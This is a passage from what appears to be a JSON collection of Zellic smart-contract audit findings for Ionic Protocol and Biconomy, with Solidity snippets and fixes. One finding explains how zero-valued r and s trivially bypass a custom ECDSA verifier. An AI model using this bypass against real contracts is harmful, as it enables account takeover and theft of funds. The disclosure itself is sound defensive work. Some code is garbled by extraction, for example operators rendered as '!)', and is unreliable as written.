can be included in a block. Mistakenly setting the _txExpirationPeriod to 0 or a low value may cause transactions to revert, which will block user redemptions. It is evident from Ionic Protocols\u2019 deploy script and tests that they have considered this issue and have appropriately set a _txExpirationPeriod time of +40 minutes. Therefore, we do not believe this has a security impact presently, but it may lead to future bugs. Consider including a require statement in the constructor to impose a minimum threshold for _txExpirationPeriod. The Jarvis documentation recommends setting the expiration period to +30 minutes in the future to account for network congestion. The issue has been fixed by Ionic Protocol in commit 782b54.", "html_url": "https://github.com/Zellic/publications/blob/master/Ionic Protocol - Zellic Audit Report.pdf" }, { "title": "3.3 Lack of input validation in initialize", "labels": [ "Zellic" ], "body": "Target: CurveLpTokenPriceOracleNoRegistry, FusePoolLens Category: Code Maturity Likelihood: Low Severity: Low Impact: Low The initialize function in both CurveLpTokenPriceOracleNoRegistry and FusePoolLens does not validate the passed array parameters, which may lead to unintended storage outcomes. 
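As a sketch of the guard recommended at the end of this finding (the signature is abridged to the relevant arrays of CurveLpTokenPriceOracleNoRegistry; the initializer modifier and revert string are assumptions):
function initialize(address[] memory _lpTokens, address[] memory _pools, address[] memory _poolUnderlyings) public initializer {
    // reject mismatched inputs up front so no mapping entry is silently skipped
    require(_lpTokens.length == _pools.length && _pools.length == _poolUnderlyings.length, \u201dArray lengths must be equal.\u201d);
    ...
}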
In both of the initialize functions, Ionic Protocol uses a for-loop to iterate through array parameters and append them to a mapping variable. If the lengths of the arrays are not equal, the initialize call will either revert or complete successfully with missing data. In CurveLpTokenPriceOracleNoRegistry, the mappings poolOf and underlyingTokens may not be set to the intended values if the length of the array _lpTokens is less than the length of either the _pools or _poolUnderlyings arrays. In FusePoolLens, the mapping variable hardcoded stores the mapping of token addresses (_hardcodedAddresses) to TokenData, which includes a token\u2019s name and symbol. If the length of the _hardcodedAddresses array is less than the length of the _hardcodedNames or _hardcodedSymbols arrays, then parameters in those arrays that exist after _hardcodedAddresses.length will not be stored. Consider adding require statements in the initialize function to validate user-controlled data input and to ensure that array lengths are equal. The issue has been fixed by Ionic Protocol in commit c71037.", "html_url": "https://github.com/Zellic/publications/blob/master/Ionic Protocol - Zellic Audit Report.pdf" }, { "title": "3.4 Centralization risk over multiple contracts", "labels": [ "Zellic" ], "body": "Target: Multiple Category: Code Maturity Likelihood: Low Severity: Low Impact: High In oracle contracts such as MasterPriceOracle, the contract\u2019s admin has central authority over functions such as setDefaultOracle. Likewise, in FusePoolDirectory, the admin has full control over the deployer whitelist. In case of a private key compromise, an attacker could change the defaultOracle to one which will report a favorable price, sandwiching their swap transaction between two calls to setDefaultOracle - the first to set a favorable oracle and the second to return the oracle to the benign default oracle. Similarly, an attacker would be able to whitelist malicious deployer addresses in FusePoolDirectory. Use a multi-signature wallet; this would prevent an attacker from causing economic damage if a private key were compromised. Set critical functions behind a TimeLock to catch malicious executions in the case of compromise. The issue has been acknowledged by Ionic Protocol and no changes have been made. Ionic Protocol states, \u201cBefore announcing our live platform, we will be transferring admin functionality to MultiSig address, avoiding the risks of single point of failure.\u201d", "html_url": "https://github.com/Zellic/publications/blob/master/Ionic Protocol - Zellic Audit Report.pdf" }, { "title": "3.5 Remove renounceOwnership functionality", "labels": [ "Zellic" ], "body": "Target: FuseFeeDistributor, FusePoolDirectory and CurveLpTokenPriceOracleNoRegistry Category: Business Logic Likelihood: N/A Severity: Informational Impact: Informational The FuseFeeDistributor, FusePoolDirectory and CurveLpTokenPriceOracleNoRegistry contracts implement OwnableUpgradeable, which provides a method named renounceOwnership that removes the current owner (Reference). This is likely not a desired feature. If renounceOwnership were called, the contract would be left without an owner. Override the renounceOwnership function: function renounceOwnership() public override onlyOwner { revert(\"This feature is not available.\"); } Ionic Protocol states that they may remove ownership of the contracts in the future, so the renounceOwnership functionality remains. 
However, they have implemented a two-step ownership change pattern for added safety when transferring contract ownership in commit eeea03. Ionic Protocol states, \u201cin the future we may want to completely remove ownership on the contracts and allow the system to work permissionlessly. All of the contracts are set up to make this possible, so we do not see this as an issue.\u201d", "html_url": "https://github.com/Zellic/publications/blob/master/Ionic Protocol - Zellic Audit Report.pdf" }, { "title": "3.1 ECDSA signatures can be trivially bypassed", "labels": [ "Zellic" ], "body": "Target: Secp256r1.sol Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical The final verification step in the PasskeyRegistryModule plug-in is to call the Verify() function in Secp256r1.sol. The latter does not adequately check the parameters before validation. The passKey parameter is picked directly from the internal mapping of public keys for msg.sender and is not directly controllable for someone else. Being of type uint, both r and s are guaranteed to be positive, and the function also verifies that they are less than the order of the curve (the variable nn below). However, it is crucial to also verify that both r != 0 and s != 0 to avoid trivial signature bypasses. function Verify( PassKeyId memory passKey, uint r, uint s, uint e ) internal view returns (bool) { if (r >= nn || s >= nn) { return false; } JPoint[16] memory points = _preComputeJacobianPoints(passKey); return VerifyWithPrecompute(points, r, s, e); } When the ECDSA verifies that a signature is signed by some public key, it takes in the tuple (r,s) (the signature pair) together with a public key and a hash. The hash is generated by hashing some representation of the operation that should be executed, and proving the signature for that hash means the owner of the public key approved the operation. The main calculation for verification in ECDSA is R\u2019 = (h * s_inv) * G + (r * s_inv) * pubKey where s_inv is the inverse of scalar s on the curve (i.e., the inverse of s modulo the curve order) and h is the hash. The signature is said to be verified if the x-coordinate of the resulting point is equal to r, as in (R\u2019).x == r Replacing r and s with 0, we get that s_inv is also 0, and the calculation becomes R\u2019 = (h * 0) * G + (0 * 0) * pubKey R\u2019 = 0 * G + 0 * pubKey R\u2019 = 0, so the check against r == 0 holds trivially, and the signature verification is always successful. Anyone who can submit operations that will be validated by the PasskeyRegistryModule can impersonate other users and do anything that the account owner could do, leading to loss of funds. Check that none of (r,s) are equal to zero. function Verify( PassKeyId memory passKey, uint r, uint s, uint e ) internal view returns (bool) { if (r >= nn || s >= nn || r == 0 || s == 0) { return false; } JPoint[16] memory points = _preComputeJacobianPoints(passKey); return VerifyWithPrecompute(points, r, s, e); } This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 5c5a6bfe. 
Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy PasskeyRegistry and SessionKeyManager Zellic Audit Report.pdf" + }, + { + "title": "3.2 PasskeyRegistryModule reverts when validating user oper- ations", + "labels": [ + "Zellic" + ], + "body": "Target: PasskeyRegistryModule.sol Category: Coding Mistakes Likelihood: High Severity: High : High The PasskeyRegistryModule contract is called from SmartAccount.sol through the va lidateUserOp function, function validateUserOp( UserOperation calldata userOp, bytes32 userOpHash, uint256 missingAccountFunds ) external virtual override returns (uint256 validationData) { if (msg.sender !) address(entryPoint())) revert CallerIsNotAnEntryPoint(msg.sender); (, address validationModule) = abi.decode( userOp.signature, (bytes, address) ); if (address(modules[validationModule]) !) address(0)) { validationData = IAuthorizationModule(validationModule) .validateUserOp(userOp, userOpHash); } else { revert WrongValidationModule(validationModule); } _validateNonce(userOp.nonce); _payPrefund(missingAccountFunds); } where userOp.signature is decoded to figure out the address for the module that should do the actual validation. The validateUserOp() function takes in the raw, un- processed userOp struct (of type UserOperation). Inside PasskeyRegistryModule.sol, the validateUserOp(userOp, userOpHash) function is just a wrapper for _validateSignature(userOp, userOpHash), which is a wrapper for _verifySignature(userOpHash, userOp.signature). Do note that the userOp.sign Zellic Biconomy Labs ature element was passed to the last function. This is the exact same value that was decoded in SmartAccount->validateUserOp(), and it contains both the signature data and the validation module address. The final function, _verifySignature(), starts like this, function _verifySignature( bytes32 userOpDataHash, bytes memory moduleSignature ) internal view returns (bool) { ( bytes32 keyHash, uint256 sigx, uint256 sigy, bytes memory authenticatorData, string memory clientDataJSONPre, string memory clientDataJSONPost ) = abi.decode( moduleSignature, (bytes32, uint256, uint256, bytes, string, string) ); ...)) } where it tries to decode the signature (including the address) as (bytes32, uint256 , uint256, bytes, string, string). This will revert because the validation module address is still a part of the decoded blob. In the SessionKeyManagerModule.sol contract, the validateUserOp() function is im- plemented correctly function validateUserOp( UserOperation calldata userOp, bytes32 userOpHash ) external view virtual returns (uint256) { SessionStorage storage sessionKeyStorage = _getSessionData(msg.sender); (bytes memory moduleSignature, ) = abi.decode( userOp.signature, (bytes, address) ); /) Here it does `abi.decode(moduleSignature, ...)))` Zellic Biconomy Labs ...)) } where the address is stripped off before decoding the remainder. The module will always revert and is not usable. If it is the only available validation module, no user operations can happen. Strip off the address like the SessionKeyManagerModule does, and write test cases for the module. Simple test cases can find mistakes such as these earlier. In general, it is good practice to build a rigorous test suite to ensure the system operates securely and as intended. This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 5c5a6bfe. 
Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy PasskeyRegistry and SessionKeyManager Zellic Audit Report.pdf" + }, + { + "title": "3.3 Missing test coverage", + "labels": [ + "Zellic" + ], + "body": "Target: Secp256r1.sol Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The Secp256r1 module implements critical functionality for signature validation, and it is implemented in a nonstandard and highly optimized way. To ensure that the library works in common cases, edge cases, and invalid cases, it is crucial to have proper test coverage for these types of primitives. There are currently no tests using this library, making it hard to see if it works at all. Missing test cases could lead to critical bugs in the cryptographic primitives. These could lead to, for example, Signature forgery and total account takeover Surprising or very random gas costs Proper signatures not validating, leading to DOS Recovery of private keys in extreme cases. Google has Project Wycheproof, which includes many test vectors for common cryp- tographic libraries and their operations. A good match for this module, which uses Secp256r1 (aka NIST P-256) and 256-bit hashes, is to use the ecdsa_secp256r1_sha25 6_test.json test vectors. Do note that many of these vectors target DER decoding, so it is safe to skip tests tagged \u201cBER\u201d. Additionally, test cases where they use numbers larger than 256 bits can be ignored, as they are invalid in Solidity when using uint256 types. These test vectors can be somewhat easily converted to Solidity library tests, giving hundreds of tests for free. This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 5c5a6bfe. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy PasskeyRegistry and SessionKeyManager Zellic Audit Report.pdf" + }, { "title": "3.4 Modexp has arbitrary gas limit", "labels": [